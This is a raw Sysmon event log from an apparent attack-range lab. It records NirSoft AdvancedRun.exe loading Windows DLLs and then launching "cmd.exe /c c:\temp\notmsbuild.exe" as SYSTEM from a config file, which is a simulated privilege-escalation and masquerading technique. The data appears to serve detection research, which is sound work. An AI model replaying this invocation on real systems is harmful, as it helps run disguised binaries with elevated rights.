WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.875{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.873{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.872{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.872{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.871{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.870{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.870{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.870{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.869{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.869{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.869{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.868{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.867{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.867{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.867{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.865{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.865{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.864{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.864{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063584Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.864{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.850{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000004063568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.862{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.859{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.859{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.858{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.857{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.855{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.855{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.855{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.854{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.852{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.851{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004063557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.851{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004063555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.848{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004063554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.848{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004063553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.839{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004057141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.257{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004057134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.248{834264DD-0FD9-61EB-D607-000000002702}5868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c c:\temp\notmsbuild.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004057133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.246{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 